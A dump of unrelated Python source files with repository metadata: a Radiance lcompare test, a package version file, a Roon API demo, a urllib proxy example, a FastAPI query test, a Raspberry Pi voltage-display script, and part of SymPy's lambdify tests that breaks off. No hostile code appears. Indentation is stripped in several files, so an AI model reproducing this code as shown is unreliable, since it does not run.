Lilith5th/Radiance
|
3aff252e57e6d2ca9205cf7caf20aaa1a897aaf2
|
[
"BSD-3-Clause-LBNL"
] | 64
|
2015-01-21T00:52:40.000Z
|
2022-02-07T12:15:09.000Z
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
import struct
import operator
import unittest
from functools import reduce
import testsupport as ts
from pyradlib import lcompare
from pyradlib.pyrad_proc import PIPE, Error, ProcMixin
class LcompareTestCase(unittest.TestCase, ProcMixin):
def test_lc_llcompare(self):
# with values higher than 44721, total will return a float in e-format.
for xc, data, exp in (
( None,
( ('abcde', 'fgh', '1234', '56.789'),
('xyz', '432', '987.65432')
),
( ('abcde', 'fgh', 1234, 56.789),
('xyz', 432, 987.65432)
),
),
( None,
( (('a', 'b', 'c'),('d', 'e', 'f')),
(('0', '1', '2', '3'),('1.1', '2.2', '3.000e-03')),
),
( (('a', 'b', 'c'),('d', 'e', 'f')),
(range(4),(1.1, 2.2, 0.003)),
),
),
( lcompare.error, # top level length
(('a', 'b', 'c'),('c','d'),('e','f'),),
(('a', 'b', 'c'),('c','d'),),
),
( lcompare.error, # top level length
(('a', 'b', 'c'),('c','d'),),
(('a', 'b', 'c'),('c','d'),('e','f'),),
),
( lcompare.error, # 2nd level length
(('a', 'b', 'c'),('c','d'),('e','f','g'),),
(('a', 'b', 'c'),('c','d'),('e','f'),),
),
( lcompare.error, # 2nd level length
(('a', 'b', 'c'),('c','d'),('e','f'),),
(('a', 'b', 'c'),('c','d'),('e','f','g'),),
),
( lcompare.error, # string diff
(('a', 'b', 'c'),('c','d'),('e','f','g'),),
(('a', 'b', 'c'),('c','d'),('e','f','h'),),
),
( lcompare.error, # int diff
(('a', 'b', 'c'),('c','d'),('1','2','3'),),
(('a', 'b', 'c'),('c','d'),( 1, 2, 4),),
),
( lcompare.error, # float diff
(('a', 'b', 'c'),('c','d'),('1.1','2.2','3.3'),),
(('a', 'b', 'c'),('c','d'),( 1.1, 2.2, 3.4),),
),
( lcompare.error, # exponent diff
(('a', 'b', 'c'),('c','d'),('1.1','2.2','3.0000e-02'),),
(('a', 'b', 'c'),('c','d'),( 1.1, 2.2, 0.003),),
),
( lcompare.error, # fuzzy compare
(('a', 'b', 'c'),('c','d'),('1.1','2.2','3.00000003'),),
(('a', 'b', 'c'),('c','d'),( 1.1, 2.2, 3.0000003),),
),
( None, # fuzzy compare
(('a', 'b', 'c'),('c','d'),('1.1','2.2','3.000000003'),),
(('a', 'b', 'c'),('c','d'),( 1.1, 2.2, 3.00000003),),
),
):
if xc:
self.assertRaises(xc, lcompare.llcompare, data, exp)
else:
try: lcompare.llcompare(data, exp)
except lcompare.error as e:
self.fail(('call_one_text ') +str(e))
def test_lc_split_headers(self):
htxt = '''example.hdr:
Xim format conversion by:
FORMAT=32-bit_rle_rgbe
pfilt -e 2 -x 512 -y 512 -p 1 -r .67
EXPOSURE=4.926198e+00
normpat
pfilt -1 -e .2
EXPOSURE=2.000000e-01
pfilt -x 128 -y 128
PIXASPECT=0.500000
EXPOSURE=2.571646e+00'''
res = lcompare.split_headers(htxt)
exp = (
('', ('example.hdr:',)),
('\t\t', ('Xim','format','conversion','by:')),
('\t\t', 'FORMAT', '=', ('32-bit_rle_rgbe',)),
('\t\t',
('pfilt','-e','2','-x','512','-y','512','-p','1','-r','.67')),
('\t\t', 'EXPOSURE', '=', ('4.926198e+00',)),
('\t\t', ('normpat',)),
('\t\t', ('pfilt','-1','-e','.2',)),
('\t\t', 'EXPOSURE', '=', ('2.000000e-01',)),
('\t\t', ('pfilt','-x','128','-y','128',)),
('\t\t', 'PIXASPECT', '=', ('0.500000',)),
('\t\t', 'EXPOSURE', '=', ('2.571646e+00',)),
)
try: lcompare.llcompare(res, exp)
except lcompare.error as e:
self.fail(('call_one_text ') +str(e))
def test_lc_split_radfile(self):
df = ts.datafile('window_src.rad')
exp = ([['#'],
['#', 'A', 'plain', 'old', 'glass', 'window'],
['#'],
[], ['void', 'light', 'window_light'],
[0], [0], [3, 1, 1, 1],
[], ['window_light', 'polygon', 'window'],
[0], [0], [12], [23.5, 43, 30], [23.5, 26, 30],
[-23.5, 26, 30], [-23.5, 43, 30], []])
resl = lcompare.split_radfile(df)
try: lcompare.lcompare(resl, exp)
except lcompare.error as e:
print(resl, exp)
self.fail(('call_one_text n=%d -- ' % n) +str(e))
def test_lc_split_rad(self):
df = ts.datafile('window_src.rad')
exp = ([['#'],
['#', 'A', 'plain', 'old', 'glass', 'window'],
['#'],
[], ['void', 'light', 'window_light'],
[0], [0], [3, 1, 1, 1],
[], ['window_light', 'polygon', 'window'],
[0], [0], [12], [23.5, 43, 30], [23.5, 26, 30],
[-23.5, 26, 30], [-23.5, 43, 30], []])
with open(df) as f:
res = f.read()
resl = lcompare.split_rad(res)
try: lcompare.lcompare(resl, exp)
except lcompare.error as e:
print(resl, exp)
self.fail(('call_one_text n=%d -- ' % n) +str(e))
# vi: set ts=4 sw=4 :
| 31.333333
| 73
| 0.450638
|
70c84394ce0fb828ae315bf04dbf7e8a6038aa89
| 316
|
py
|
Python
|
rest_action_permissions/__version__.py
|
apirobot/django-rest-action-permissions
|
79d25a19dc5a8b3b0047d3f5d3ef185cac7ba09b
|
[
"MIT"
] | 8
|
2018-05-30T09:43:05.000Z
|
2021-07-10T12:55:47.000Z
|
rest_action_permissions/__version__.py
|
apirobot/django-rest-action-permissions
|
79d25a19dc5a8b3b0047d3f5d3ef185cac7ba09b
|
[
"MIT"
] | 2
|
2018-05-30T09:43:34.000Z
|
2019-05-28T05:47:35.000Z
|
rest_action_permissions/__version__.py
|
apirobot/django-rest-action-permissions
|
79d25a19dc5a8b3b0047d3f5d3ef185cac7ba09b
|
[
"MIT"
] | 2
|
2019-04-21T12:51:15.000Z
|
2020-04-11T12:16:08.000Z
|
__version__ = '2.0.0'
__title__ = 'django-rest-action-permissions'
__description__ = 'Action based permissions for Django REST Framework.'
__url__ = 'https://github.com/apirobot/django-rest-action-permissions'
__author__ = 'Denis Orehovsky'
__author_email__ = 'denis.orehovsky@gmail.com'
__license__ = 'MIT License'
| 39.5
| 71
| 0.78481
|
cf5fe6b92130053a403b188075dc9566883dd02a
| 702
|
py
|
Python
|
examples/demo.py
|
doctorfree/pyroon
|
0b00a44aa2bfb28fa26c8345bcdf6fb79e497fa3
|
[
"Apache-2.0"
] | 10
|
2018-09-03T14:30:02.000Z
|
2020-03-04T16:53:46.000Z
|
examples/demo.py
|
doctorfree/pyroon
|
0b00a44aa2bfb28fa26c8345bcdf6fb79e497fa3
|
[
"Apache-2.0"
] | 2
|
2019-02-19T20:17:35.000Z
|
2019-03-10T18:56:53.000Z
|
examples/demo.py
|
doctorfree/pyroon
|
0b00a44aa2bfb28fa26c8345bcdf6fb79e497fa3
|
[
"Apache-2.0"
] | 5
|
2019-03-03T11:54:37.000Z
|
2020-07-04T15:11:25.000Z
|
from roonapi import RoonApi, RoonDiscovery
appinfo = {
"extension_id": "python_roon_test",
"display_name": "Python library for Roon",
"display_version": "1.0.0",
"publisher": "gregd",
"email": "mygreat@emailaddress.com",
}
# Can be None if you don't yet have a token
try:
core_id = open("my_core_id_file").read()
token = open("my_token_file").read()
except OSError:
print("Please authorise first using discovery.py")
exit()
discover = RoonDiscovery(core_id)
server = discover.first()
discover.stop()
roonapi = RoonApi(appinfo, token, server[0], server[1], True)
# get all zones (as dict)
print(roonapi.zones)
# get all outputs (as dict)
print(roonapi.outputs)
| 23.4
| 61
| 0.692308
|
0b480abbd0929859dbfc8bd712ac67f8f4643abf
| 642
|
py
|
Python
|
python/crawler/hello_urllib2_proxyhandler.py
|
fendoudebb/learnin
|
e9bdfcaa028b6a41fd7bebfbbc2037f50f2112e1
|
[
"Apache-2.0"
] | 1
|
2021-03-30T06:02:07.000Z
|
2021-03-30T06:02:07.000Z
|
python/crawler/hello_urllib2_proxyhandler.py
|
fendoudebb/learnin
|
e9bdfcaa028b6a41fd7bebfbbc2037f50f2112e1
|
[
"Apache-2.0"
] | 4
|
2021-03-08T12:58:36.000Z
|
2021-11-16T05:43:20.000Z
|
python/crawler/hello_urllib2_proxyhandler.py
|
fendoudebb/learnin
|
e9bdfcaa028b6a41fd7bebfbbc2037f50f2112e1
|
[
"Apache-2.0"
] | 2
|
2021-04-22T02:39:11.000Z
|
2021-07-30T01:44:04.000Z
|
# -*- coding:utf-8 -*-
from http.client import HTTPResponse
from urllib import request
# 构建代理HTTP处理对象
proxy_handler = request.ProxyHandler({'http': '127.0.0.1:8080'})
opener = request.build_opener(proxy_handler)
# 构建全局opener,之后所有请求都可以用urlopen(),否则必须使用opener.open(),不然不走代理
request.install_opener(opener)
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
}
r = request.Request('http://www.baidu.com', headers=headers)
# response = opener.open(r)
response = request.urlopen(r) # type: HTTPResponse
print(response.read().decode('gbk'))
| 25.68
| 120
| 0.721184
|
467ed9f4fb6c1f9497d230e555279b11edb159a6
| 3,449
|
py
|
Python
|
tests/test_multi_query_errors.py
|
jfunez/fastapi
|
7372f6ba11abb515a7f11814dba52a1d1c0925f0
|
[
"MIT"
] | 2
|
2020-04-09T07:11:28.000Z
|
2020-12-12T14:04:35.000Z
|
tests/test_multi_query_errors.py
|
jfunez/fastapi
|
7372f6ba11abb515a7f11814dba52a1d1c0925f0
|
[
"MIT"
] | 1
|
2021-03-27T18:37:32.000Z
|
2021-05-25T15:08:24.000Z
|
tests/test_multi_query_errors.py
|
jfunez/fastapi
|
7372f6ba11abb515a7f11814dba52a1d1c0925f0
|
[
"MIT"
] | 1
|
2021-02-03T00:43:04.000Z
|
2021-02-03T00:43:04.000Z
|
from typing import List
from fastapi import FastAPI, Query
from fastapi.testclient import TestClient
app = FastAPI()
@app.get("/items/")
def read_items(q: List[int] = Query(None)):
return {"q": q}
client = TestClient(app)
openapi_schema = {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/items/": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"summary": "Read Items",
"operationId": "read_items_items__get",
"parameters": [
{
"required": False,
"schema": {
"title": "Q",
"type": "array",
"items": {"type": "integer"},
},
"name": "q",
"in": "query",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {"type": "string"},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
multiple_errors = {
"detail": [
{
"loc": ["query", "q", 0],
"msg": "value is not a valid integer",
"type": "type_error.integer",
},
{
"loc": ["query", "q", 1],
"msg": "value is not a valid integer",
"type": "type_error.integer",
},
]
}
def test_openapi_schema():
response = client.get("/openapi.json")
assert response.status_code == 200
assert response.json() == openapi_schema
def test_multi_query():
response = client.get("/items/?q=5&q=6")
assert response.status_code == 200
assert response.json() == {"q": [5, 6]}
def test_multi_query_incorrect():
response = client.get("/items/?q=five&q=six")
assert response.status_code == 422
assert response.json() == multiple_errors
| 28.983193
| 86
| 0.372282
|
633f5c84cf41bc3d9e488b416f173abe3a17c0ab
| 1,932
|
py
|
Python
|
read_pot.py
|
94KeyboardsSmashed/MWR_PlasmaPot
|
8ed21c9ea324b5107ac67a5272c044ce08bd81a5
|
[
"MIT"
] | null | null | null |
read_pot.py
|
94KeyboardsSmashed/MWR_PlasmaPot
|
8ed21c9ea324b5107ac67a5272c044ce08bd81a5
|
[
"MIT"
] | null | null | null |
read_pot.py
|
94KeyboardsSmashed/MWR_PlasmaPot
|
8ed21c9ea324b5107ac67a5272c044ce08bd81a5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import serial
from sys import stdout
import time
import threading
import raspi_neopixel_lib
import Adafruit_CharLCD as LCD
# Raspberry Pi pin configuration:
lcd_rs = 26
lcd_en = 19
lcd_d4 = 13
lcd_d5 = 6
lcd_d6 = 5
lcd_d7 = 11
lcd_backlight = 9
#Neopixel Config
LED_COUNT_1 = 24
LED_PIN_1 = 18
LED_FREQ_HZ_1 = 800000
LED_DMA_1 = 5
LED_BRIGHTNESS_1 = 255
LED_INVERT_1 = False
# Define LCD column and row size for 16x2 LCD.
lcd_columns = 16
lcd_rows = 2
timer = 0
# Initialize the LCD using the pins above.
lcd = LCD.Adafruit_CharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,
lcd_columns, lcd_rows, lcd_backlight)
# Print a two line message
lcd.set_backlight(0)
lcd.message('Starting')
ser = serial.Serial('/dev/ttyACM0',9600)
s = []
CORSICA = raspi_neopixel_lib.Adafruit_NeoPixel(LED_COUNT_1, LED_PIN_1, LED_FREQ_HZ_1,
LED_DMA_1, LED_INVERT_1, LED_BRIGHTNESS_1)
CORSICA.begin()
while True:
read_serial=ser.readline()
stripped = read_serial.rstrip()
s.append(stripped)
if len(s) >= 20:
s.pop(0)
for val in s:
if not val.isdigit():
s.remove(val)
v = list(map(int, s))
average = int(sum(v)/len(v))
image = ((58.0/1023.0)*float(average))
rounded = "%.0f" %image
print (rounded)
kilovolts = ((10.0/1023.0)*float(average)) #(19.0/3410.0)*x+4.3 for 4.3-10.0
if timer == 50:
timer = 0
lcd.clear()
lcd.message('Voltage\n%.1f KV' %kilovolts)
elif timer % 7 == 0:
CORSICA.neopixel_percentage(float(rounded)/58)
stdout.flush()
timer += 1
| 28
| 95
| 0.556936
|
4752fa7796305a4518e93f16878f63f4aa63dda7
| 44,985
|
py
|
Python
|
sympy/utilities/tests/test_lambdify.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 2
|
2021-08-25T13:51:41.000Z
|
2022-01-06T07:12:47.000Z
|
sympy/utilities/tests/test_lambdify.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 2
|
2021-06-02T17:18:28.000Z
|
2021-06-02T17:38:57.000Z
|
sympy/utilities/tests/test_lambdify.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 1
|
2021-02-20T14:12:19.000Z
|
2021-02-20T14:12:19.000Z
|
from itertools import product
import math
import inspect
import mpmath
from sympy.testing.pytest import raises
from sympy import (
symbols, lambdify, sqrt, sin, cos, tan, pi, acos, acosh, Rational,
Float, Lambda, Piecewise, exp, E, Integral, oo, I, Abs, Function,
true, false, And, Or, Not, ITE, Min, Max, floor, diff, IndexedBase, Sum,
DotProduct, Eq, Dummy, sinc, erf, erfc, factorial, gamma, loggamma,
digamma, RisingFactorial, besselj, bessely, besseli, besselk, S, beta,
betainc, betainc_regularized, fresnelc, fresnels)
from sympy.codegen.cfunctions import expm1, log1p, exp2, log2, log10, hypot
from sympy.codegen.numpy_nodes import logaddexp, logaddexp2
from sympy.codegen.scipy_nodes import cosm1
from sympy.functions.elementary.complexes import re, im, arg
from sympy.functions.special.polynomials import \
chebyshevt, chebyshevu, legendre, hermite, laguerre, gegenbauer, \
assoc_legendre, assoc_laguerre, jacobi
from sympy.matrices import Matrix, MatrixSymbol, SparseMatrix
from sympy.printing.lambdarepr import LambdaPrinter
from sympy.printing.numpy import NumPyPrinter
from sympy.utilities.lambdify import implemented_function, lambdastr
from sympy.testing.pytest import skip
from sympy.utilities.decorator import conserve_mpmath_dps
from sympy.external import import_module
from sympy.functions.special.gamma_functions import uppergamma, lowergamma
import sympy
MutableDenseMatrix = Matrix
numpy = import_module('numpy')
scipy = import_module('scipy', import_kwargs={'fromlist': ['sparse']})
numexpr = import_module('numexpr')
tensorflow = import_module('tensorflow')
cupy = import_module('cupy')
if tensorflow:
# Hide Tensorflow warnings
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
w, x, y, z = symbols('w,x,y,z')
#================== Test different arguments =======================
def test_no_args():
f = lambdify([], 1)
raises(TypeError, lambda: f(-1))
assert f() == 1
def test_single_arg():
f = lambdify(x, 2*x)
assert f(1) == 2
def test_list_args():
f = lambdify([x, y], x + y)
assert f(1, 2) == 3
def test_nested_args():
f1 = lambdify([[w, x]], [w, x])
assert f1([91, 2]) == [91, 2]
raises(TypeError, lambda: f1(1, 2))
f2 = lambdify([(w, x), (y, z)], [w, x, y, z])
assert f2((18, 12), (73, 4)) == [18, 12, 73, 4]
raises(TypeError, lambda: f2(3, 4))
f3 = lambdify([w, [[[x]], y], z], [w, x, y, z])
assert f3(10, [[[52]], 31], 44) == [10, 52, 31, 44]
def test_str_args():
f = lambdify('x,y,z', 'z,y,x')
assert f(3, 2, 1) == (1, 2, 3)
assert f(1.0, 2.0, 3.0) == (3.0, 2.0, 1.0)
# make sure correct number of args required
raises(TypeError, lambda: f(0))
def test_own_namespace_1():
myfunc = lambda x: 1
f = lambdify(x, sin(x), {"sin": myfunc})
assert f(0.1) == 1
assert f(100) == 1
def test_own_namespace_2():
def myfunc(x):
return 1
f = lambdify(x, sin(x), {'sin': myfunc})
assert f(0.1) == 1
assert f(100) == 1
def test_own_module():
f = lambdify(x, sin(x), math)
assert f(0) == 0.0
def test_bad_args():
# no vargs given
raises(TypeError, lambda: lambdify(1))
# same with vector exprs
raises(TypeError, lambda: lambdify([1, 2]))
def test_atoms():
# Non-Symbol atoms should not be pulled out from the expression namespace
f = lambdify(x, pi + x, {"pi": 3.14})
assert f(0) == 3.14
f = lambdify(x, I + x, {"I": 1j})
assert f(1) == 1 + 1j
#================== Test different modules =========================
# high precision output of sin(0.2*pi) is used to detect if precision is lost unwanted
@conserve_mpmath_dps
def test_sympy_lambda():
mpmath.mp.dps = 50
sin02 = mpmath.mpf("0.19866933079506121545941262711838975037020672954020")
f = lambdify(x, sin(x), "sympy")
assert f(x) == sin(x)
prec = 1e-15
assert -prec < f(Rational(1, 5)).evalf() - Float(str(sin02)) < prec
# arctan is in numpy module and should not be available
# The arctan below gives NameError. What is this supposed to test?
# raises(NameError, lambda: lambdify(x, arctan(x), "sympy"))
@conserve_mpmath_dps
def test_math_lambda():
mpmath.mp.dps = 50
sin02 = mpmath.mpf("0.19866933079506121545941262711838975037020672954020")
f = lambdify(x, sin(x), "math")
prec = 1e-15
assert -prec < f(0.2) - sin02 < prec
raises(TypeError, lambda: f(x))
# if this succeeds, it can't be a python math function
@conserve_mpmath_dps
def test_mpmath_lambda():
mpmath.mp.dps = 50
sin02 = mpmath.mpf("0.19866933079506121545941262711838975037020672954020")
f = lambdify(x, sin(x), "mpmath")
prec = 1e-49 # mpmath precision is around 50 decimal places
assert -prec < f(mpmath.mpf("0.2")) - sin02 < prec
raises(TypeError, lambda: f(x))
# if this succeeds, it can't be a mpmath function
@conserve_mpmath_dps
def test_number_precision():
mpmath.mp.dps = 50
sin02 = mpmath.mpf("0.19866933079506121545941262711838975037020672954020")
f = lambdify(x, sin02, "mpmath")
prec = 1e-49 # mpmath precision is around 50 decimal places
assert -prec < f(0) - sin02 < prec
@conserve_mpmath_dps
def test_mpmath_precision():
mpmath.mp.dps = 100
assert str(lambdify((), pi.evalf(100), 'mpmath')()) == str(pi.evalf(100))
#================== Test Translations ==============================
# We can only check if all translated functions are valid. It has to be checked
# by hand if they are complete.
def test_math_transl():
from sympy.utilities.lambdify import MATH_TRANSLATIONS
for sym, mat in MATH_TRANSLATIONS.items():
assert sym in sympy.__dict__
assert mat in math.__dict__
def test_mpmath_transl():
from sympy.utilities.lambdify import MPMATH_TRANSLATIONS
for sym, mat in MPMATH_TRANSLATIONS.items():
assert sym in sympy.__dict__ or sym == 'Matrix'
assert mat in mpmath.__dict__
def test_numpy_transl():
if not numpy:
skip("numpy not installed.")
from sympy.utilities.lambdify import NUMPY_TRANSLATIONS
for sym, nump in NUMPY_TRANSLATIONS.items():
assert sym in sympy.__dict__
assert nump in numpy.__dict__
def test_scipy_transl():
if not scipy:
skip("scipy not installed.")
from sympy.utilities.lambdify import SCIPY_TRANSLATIONS
for sym, scip in SCIPY_TRANSLATIONS.items():
assert sym in sympy.__dict__
assert scip in scipy.__dict__ or scip in scipy.special.__dict__
def test_numpy_translation_abs():
if not numpy:
skip("numpy not installed.")
f = lambdify(x, Abs(x), "numpy")
assert f(-1) == 1
assert f(1) == 1
def test_numexpr_printer():
if not numexpr:
skip("numexpr not installed.")
# if translation/printing is done incorrectly then evaluating
# a lambdified numexpr expression will throw an exception
from sympy.printing.lambdarepr import NumExprPrinter
blacklist = ('where', 'complex', 'contains')
arg_tuple = (x, y, z) # some functions take more than one argument
for sym in NumExprPrinter._numexpr_functions.keys():
if sym in blacklist:
continue
ssym = S(sym)
if hasattr(ssym, '_nargs'):
nargs = ssym._nargs[0]
else:
nargs = 1
args = arg_tuple[:nargs]
f = lambdify(args, ssym(*args), modules='numexpr')
assert f(*(1, )*nargs) is not None
def test_issue_9334():
if not numexpr:
skip("numexpr not installed.")
if not numpy:
skip("numpy not installed.")
expr = S('b*a - sqrt(a**2)')
a, b = sorted(expr.free_symbols, key=lambda s: s.name)
func_numexpr = lambdify((a,b), expr, modules=[numexpr], dummify=False)
foo, bar = numpy.random.random((2, 4))
func_numexpr(foo, bar)
def test_issue_12984():
import warnings
if not numexpr:
skip("numexpr not installed.")
func_numexpr = lambdify((x,y,z), Piecewise((y, x >= 0), (z, x > -1)), numexpr)
assert func_numexpr(1, 24, 42) == 24
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
assert str(func_numexpr(-1, 24, 42)) == 'nan'
#================== Test some functions ============================
def test_exponentiation():
f = lambdify(x, x**2)
assert f(-1) == 1
assert f(0) == 0
assert f(1) == 1
assert f(-2) == 4
assert f(2) == 4
assert f(2.5) == 6.25
def test_sqrt():
f = lambdify(x, sqrt(x))
assert f(0) == 0.0
assert f(1) == 1.0
assert f(4) == 2.0
assert abs(f(2) - 1.414) < 0.001
assert f(6.25) == 2.5
def test_trig():
f = lambdify([x], [cos(x), sin(x)], 'math')
d = f(pi)
prec = 1e-11
assert -prec < d[0] + 1 < prec
assert -prec < d[1] < prec
d = f(3.14159)
prec = 1e-5
assert -prec < d[0] + 1 < prec
assert -prec < d[1] < prec
def test_integral():
f = Lambda(x, exp(-x**2))
l = lambdify(y, Integral(f(x), (x, y, oo)))
d = l(-oo)
assert 1.77245385 < d < 1.772453851
def test_double_integral():
# example from http://mpmath.org/doc/current/calculus/integration.html
i = Integral(1/(1 - x**2*y**2), (x, 0, 1), (y, 0, z))
l = lambdify([z], i)
d = l(1)
assert 1.23370055 < d < 1.233700551
#================== Test vectors ===================================
def test_vector_simple():
f = lambdify((x, y, z), (z, y, x))
assert f(3, 2, 1) == (1, 2, 3)
assert f(1.0, 2.0, 3.0) == (3.0, 2.0, 1.0)
# make sure correct number of args required
raises(TypeError, lambda: f(0))
def test_vector_discontinuous():
f = lambdify(x, (-1/x, 1/x))
raises(ZeroDivisionError, lambda: f(0))
assert f(1) == (-1.0, 1.0)
assert f(2) == (-0.5, 0.5)
assert f(-2) == (0.5, -0.5)
def test_trig_symbolic():
f = lambdify([x], [cos(x), sin(x)], 'math')
d = f(pi)
assert abs(d[0] + 1) < 0.0001
assert abs(d[1] - 0) < 0.0001
def test_trig_float():
f = lambdify([x], [cos(x), sin(x)])
d = f(3.14159)
assert abs(d[0] + 1) < 0.0001
assert abs(d[1] - 0) < 0.0001
def test_docs():
f = lambdify(x, x**2)
assert f(2) == 4
f = lambdify([x, y, z], [z, y, x])
assert f(1, 2, 3) == [3, 2, 1]
f = lambdify(x, sqrt(x))
assert f(4) == 2.0
f = lambdify((x, y), sin(x*y)**2)
assert f(0, 5) == 0
def test_math():
f = lambdify((x, y), sin(x), modules="math")
assert f(0, 5) == 0
def test_sin():
f = lambdify(x, sin(x)**2)
assert isinstance(f(2), float)
f = lambdify(x, sin(x)**2, modules="math")
assert isinstance(f(2), float)
def test_matrix():
A = Matrix([[x, x*y], [sin(z) + 4, x**z]])
sol = Matrix([[1, 2], [sin(3) + 4, 1]])
f = lambdify((x, y, z), A, modules="sympy")
assert f(1, 2, 3) == sol
f = lambdify((x, y, z), (A, [A]), modules="sympy")
assert f(1, 2, 3) == (sol, [sol])
J = Matrix((x, x + y)).jacobian((x, y))
v = Matrix((x, y))
sol = Matrix([[1, 0], [1, 1]])
assert lambdify(v, J, modules='sympy')(1, 2) == sol
assert lambdify(v.T, J, modules='sympy')(1, 2) == sol
def test_numpy_matrix():
if not numpy:
skip("numpy not installed.")
A = Matrix([[x, x*y], [sin(z) + 4, x**z]])
sol_arr = numpy.array([[1, 2], [numpy.sin(3) + 4, 1]])
#Lambdify array first, to ensure return to array as default
f = lambdify((x, y, z), A, ['numpy'])
numpy.testing.assert_allclose(f(1, 2, 3), sol_arr)
#Check that the types are arrays and matrices
assert isinstance(f(1, 2, 3), numpy.ndarray)
# gh-15071
class dot(Function):
pass
x_dot_mtx = dot(x, Matrix([[2], [1], [0]]))
f_dot1 = lambdify(x, x_dot_mtx)
inp = numpy.zeros((17, 3))
assert numpy.all(f_dot1(inp) == 0)
strict_kw = dict(allow_unknown_functions=False, inline=True, fully_qualified_modules=False)
p2 = NumPyPrinter(dict(user_functions={'dot': 'dot'}, **strict_kw))
f_dot2 = lambdify(x, x_dot_mtx, printer=p2)
assert numpy.all(f_dot2(inp) == 0)
p3 = NumPyPrinter(strict_kw)
# The line below should probably fail upon construction (before calling with "(inp)"):
raises(Exception, lambda: lambdify(x, x_dot_mtx, printer=p3)(inp))
def test_numpy_transpose():
if not numpy:
skip("numpy not installed.")
A = Matrix([[1, x], [0, 1]])
f = lambdify((x), A.T, modules="numpy")
numpy.testing.assert_array_equal(f(2), numpy.array([[1, 0], [2, 1]]))
def test_numpy_dotproduct():
if not numpy:
skip("numpy not installed")
A = Matrix([x, y, z])
f1 = lambdify([x, y, z], DotProduct(A, A), modules='numpy')
f2 = lambdify([x, y, z], DotProduct(A, A.T), modules='numpy')
f3 = lambdify([x, y, z], DotProduct(A.T, A), modules='numpy')
f4 = lambdify([x, y, z], DotProduct(A, A.T), modules='numpy')
assert f1(1, 2, 3) == \
f2(1, 2, 3) == \
f3(1, 2, 3) == \
f4(1, 2, 3) == \
numpy.array([14])
def test_numpy_inverse():
if not numpy:
skip("numpy not installed.")
A = Matrix([[1, x], [0, 1]])
f = lambdify((x), A**-1, modules="numpy")
numpy.testing.assert_array_equal(f(2), numpy.array([[1, -2], [0, 1]]))
def test_numpy_old_matrix():
if not numpy:
skip("numpy not installed.")
A = Matrix([[x, x*y], [sin(z) + 4, x**z]])
sol_arr = numpy.array([[1, 2], [numpy.sin(3) + 4, 1]])
f = lambdify((x, y, z), A, [{'ImmutableDenseMatrix': numpy.matrix}, 'numpy'])
numpy.testing.assert_allclose(f(1, 2, 3), sol_arr)
assert isinstance(f(1, 2, 3), numpy.matrix)
def test_scipy_sparse_matrix():
if not scipy:
skip("scipy not installed.")
A = SparseMatrix([[x, 0], [0, y]])
f = lambdify((x, y), A, modules="scipy")
B = f(1, 2)
assert isinstance(B, scipy.sparse.coo_matrix)
def test_python_div_zero_issue_11306():
if not numpy:
skip("numpy not installed.")
p = Piecewise((1 / x, y < -1), (x, y < 1), (1 / x, True))
f = lambdify([x, y], p, modules='numpy')
numpy.seterr(divide='ignore')
assert float(f(numpy.array([0]),numpy.array([0.5]))) == 0
assert str(float(f(numpy.array([0]),numpy.array([1])))) == 'inf'
numpy.seterr(divide='warn')
def test_issue9474():
mods = [None, 'math']
if numpy:
mods.append('numpy')
if mpmath:
mods.append('mpmath')
for mod in mods:
f = lambdify(x, S.One/x, modules=mod)
assert f(2) == 0.5
f = lambdify(x, floor(S.One/x), modules=mod)
assert f(2) == 0
for absfunc, modules in product([Abs, abs], mods):
f = lambdify(x, absfunc(x), modules=modules)
assert f(-1) == 1
assert f(1) == 1
assert f(3+4j) == 5
def test_issue_9871():
if not numexpr:
skip("numexpr not installed.")
if not numpy:
skip("numpy not installed.")
r = sqrt(x**2 + y**2)
expr = diff(1/r, x)
xn = yn = numpy.linspace(1, 10, 16)
# expr(xn, xn) = -xn/(sqrt(2)*xn)^3
fv_exact = -numpy.sqrt(2.)**-3 * xn**-2
fv_numpy = lambdify((x, y), expr, modules='numpy')(xn, yn)
fv_numexpr = lambdify((x, y), expr, modules='numexpr')(xn, yn)
numpy.testing.assert_allclose(fv_numpy, fv_exact, rtol=1e-10)
numpy.testing.assert_allclose(fv_numexpr, fv_exact, rtol=1e-10)
def test_numpy_piecewise():
if not numpy:
skip("numpy not installed.")
pieces = Piecewise((x, x < 3), (x**2, x > 5), (0, True))
f = lambdify(x, pieces, modules="numpy")
numpy.testing.assert_array_equal(f(numpy.arange(10)),
numpy.array([0, 1, 2, 0, 0, 0, 36, 49, 64, 81]))
# If we evaluate somewhere all conditions are False, we should get back NaN
nodef_func = lambdify(x, Piecewise((x, x > 0), (-x, x < 0)))
numpy.testing.assert_array_equal(nodef_func(numpy.array([-1, 0, 1])),
numpy.array([1, numpy.nan, 1]))
def test_numpy_logical_ops():
if not numpy:
skip("numpy not installed.")
and_func = lambdify((x, y), And(x, y), modules="numpy")
and_func_3 = lambdify((x, y, z), And(x, y, z), modules="numpy")
or_func = lambdify((x, y), Or(x, y), modules="numpy")
